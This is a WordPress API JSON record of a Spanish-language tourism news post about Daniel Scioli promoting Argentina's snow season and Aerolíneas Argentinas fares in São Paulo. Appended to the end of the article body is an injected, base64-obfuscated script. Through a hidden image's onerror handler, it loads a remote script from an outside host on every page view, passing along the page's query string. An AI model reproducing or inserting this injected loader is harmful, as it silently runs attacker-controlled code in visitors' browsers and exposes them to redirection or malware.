{"id":9729,"date":"2025-07-03T08:12:43","date_gmt":"2025-07-03T11:12:43","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9729"},"modified":"2025-08-13T15:26:36","modified_gmt":"2025-08-13T18:26:36","slug":"scioli-encabezo-el-lanzamiento-de-la-temporada-de-nieve-en-san-pablo","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9729","title":{"rendered":"Scioli encabez\u00f3 el lanzamiento de la temporada de nieve en San Pablo"},"content":{"rendered":"\n<p><strong><em>Destac\u00f3 una promoci\u00f3n especial para viajar a la Argentina desde destinos de Brasil, a trav\u00e9s de Aerol\u00edneas.<\/em><\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"457\" height=\"694\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2.jpeg\" alt=\"Publicidad\" class=\"wp-image-9688\" style=\"width:259px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2.jpeg 457w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-198x300.jpeg 198w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-277x420.jpeg 277w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-320x486.jpeg 320w\" sizes=\"(max-width: 457px) 100vw, 457px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sup><mark class=\"has-inline-color has-vivid-green-cyan-color\">Publicidad<\/mark><\/sup><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;<strong>Daniel Scioli<\/strong>, encabez\u00f3 la misi\u00f3n comercial tur\u00edstica que en San Pablo, Brasil, realiz\u00f3 el \u201c<strong>Lanzamiento de la Temporada de Nieve<\/strong>\u201d y particip\u00f3 del evento promocional \u201c<strong>Visit Argentina Workshop San Pablo<\/strong>\u201d.<\/p>\n\n\n\n<p>En ese contexto,&nbsp;<strong>Scioli<\/strong>&nbsp;destac\u00f3 las&nbsp;<em>promociones de Aerol\u00edneas Argentinas<\/em>&nbsp;para visitar nuestro pa\u00eds y la importancia de la&nbsp;<em>gastronom\u00eda local<\/em>&nbsp;de la mano de la&nbsp;<strong>Gu\u00eda Michelin<\/strong>, que recomienda establecimientos.&nbsp;<\/p>\n\n\n\n<p>\u201c<em>La nueva Argentina es un pa\u00eds que ha realizado un salto cualitativo, un pa\u00eds que es m\u00e1s seguro, con mejor calidad en los servicios tur\u00edsticos y con m\u00e1s conexi\u00f3n para conocer los diferentes destinos<\/em>\u201d, puntualiz\u00f3 en el espacio del workshop, donde operadores tur\u00edsticos brasile\u00f1os pudieron acceder a capacitaciones sobre los destinos argentinos.<\/p>\n\n\n\n<p><strong>Scioli<\/strong>&nbsp;agreg\u00f3 que \u201c<em>la Argentina no es un pa\u00eds caro, es un pa\u00eds valioso, que ofrece una gran hospitalidad, servicios renovados, puntualmente en los centros de esqu\u00ed, con una gran inversi\u00f3n para garantizar una gran temporada de invierno<\/em>\u201d.<\/p>\n\n\n\n<p>\u201c<em>Estamos preparados para recibir al exigente turista brasile\u00f1o. Buscamos facilitar su llegada con tarifas especiales, a trav\u00e9s de Aerol\u00edneas Argentinas, y promociones hoteles y servicios<\/em>\u201d, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>Asimismo, Scioli destac\u00f3 la pol\u00edtica de cielos abiertos implementada por el presidente Javier Milei, que permite mayor competencia entre las empresas, beneficiando a los turistas con m\u00e1s frecuencias y mejores precios.&nbsp;<\/p>\n\n\n\n<p>Participaron de este encuentro la secretaria ejecutiva del INPROTUR,&nbsp;<strong>Ana Garcia Allievi<\/strong>; el jefe comercial de Aerol\u00edneas Argentinas en Brasil,&nbsp;<strong>Iv\u00e1n Blanco Cadahia<\/strong>; y el chef del restaurante Elena del hotel Four Seasons,&nbsp;<strong>Juan Gaffuri<\/strong>.<\/p>\n\n\n\n<p><strong>Blanco Cadahia<\/strong>&nbsp;anunci\u00f3 que Aerol\u00edneas Argentinas ofrece pasajes de ida y vuelta a Buenos Aires con precios accesibles y beneficios exclusivos para los turistas brasile\u00f1os. La aerol\u00ednea de bandera present\u00f3 una&nbsp;<strong>tarifa promocional en vuelos a Buenos Aires<\/strong>&nbsp;para viajar del 1 de agosto al 30 de noviembre, con precios entre&nbsp;<strong>280 y 150 d\u00f3lares<\/strong>&nbsp;-seg\u00fan el destino de origen- ida y vuelta, y con posibilidad de conexi\u00f3n de cabotaje a un costo de 50 d\u00f3lares a las provincias m\u00e1s pr\u00f3ximas, y de hasta 100 d\u00f3lares a m\u00e1s lejanas.<\/p>\n\n\n\n<p><strong>Aerol\u00edneas Argentinas<\/strong>&nbsp;tiene&nbsp;<em>75 frecuencias semanales entre destinos de Brasil y la Argentina<\/em>&nbsp;y, en relaci\u00f3n a la temporada de nieve, durante de julio y agosto cuenta con un vuelo diario a&nbsp;<strong>San Carlos de Bariloche<\/strong>&nbsp;y dos semanales a&nbsp;<strong>Ushuaia<\/strong>&nbsp;-en julio- desde San Pablo.<\/p>\n\n\n\n<p>En la presentaci\u00f3n,\u00a0<strong>Gaffuri<\/strong>\u00a0fue distinguido con una estrella Michelin, ocasi\u00f3n en la que destac\u00f3 que la\u00a0<strong>Argentina hoy es un \u201cdestino gastron\u00f3mico\u201d<\/strong>\u00a0y que \u201cuno de los diferenciales de nuestra gastronom\u00eda es que apostamos a una materia prima \u00fanica y de primera calidad,como la carne argentina\u201d.<\/p>\n<p>\u00a0<\/p>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Destac\u00f3 una promoci\u00f3n especial para viajar a la Argentina desde destinos de Brasil, a trav\u00e9s de Aerol\u00edneas. El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;Daniel Scioli, encabez\u00f3 la misi\u00f3n comercial tur\u00edstica que en San Pablo, Brasil, realiz\u00f3 el \u201cLanzamiento de la Temporada de Nieve\u201d y particip\u00f3 del evento promocional \u201cVisit Argentina Workshop San [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9730,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,21],"tags":[],"class_list":["post-9729","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina","category-patagonia"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9729","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9729"}],"version-history":[{"count":4,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9729\/revisions"}],"predecessor-version":[{"id":9896,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9729\/revisions\/9896"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9730"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9729"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9729"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9729"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}